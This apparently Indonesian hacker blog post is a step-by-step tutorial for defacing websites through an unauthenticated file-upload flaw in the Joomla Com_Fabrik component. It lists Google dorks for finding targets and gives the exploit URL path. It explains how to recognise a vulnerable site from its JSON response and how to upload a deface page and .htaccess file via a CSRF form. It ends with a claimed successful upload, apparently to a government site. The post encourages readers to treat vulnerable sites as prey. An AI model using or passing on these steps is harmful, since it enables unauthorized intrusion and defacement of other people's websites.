soory karena keterbatasan kuota hohoho :v
oke kali ini gua bakalan share cara deface metode Com_Fabrik CSRF
simak tutorialnya ea
Siapin dlu Dorknya
-Dork : inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:.dk
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
kenbangin pake otak mesum lu ea..jngan cma khayalan yang dikembangin 😀 Kidding
Exploitnya : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Truss htaccess nya DirumahGue
Csrf nya DirumahLu
Oke langsung aja simak baik2..
Pertama dorking dlu di google
Truss masukin tuh exploitnya d blakang link,,
contoh: site.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
nah klo udah ditambahin nanti akan muncul kaya gini
nah kalo tulisanya kaya gini {"filepath":null,"uri":null} brarti tuh website vuln ea ..
langsung jadiin mangsa :v
setelah itu masukin tuh site.co.li nya ke CSRF
Itu yang Site.co,li nya diganti nama site target luh ea
nah setelah jadi langsung deh luh masukin scrip deface luh sama htaccess nya
jangan lupa ganti htaccess nya jadi nama sc lu ea kaya gini
nah setelah itu upload sc deface kalian dah akan kaya gini hasilnya
muncul tulisan {"filepath":"\/ilusi.html","uri":"http:\/\/www.pn-parepare.go.id.org\/ilusi.html"}
brarti sukses uploadnya
semoga berhasil ya jika ada pertanyaan silakan tulis di komentar
trima kasih bye...
0 komentar:
Posting Komentar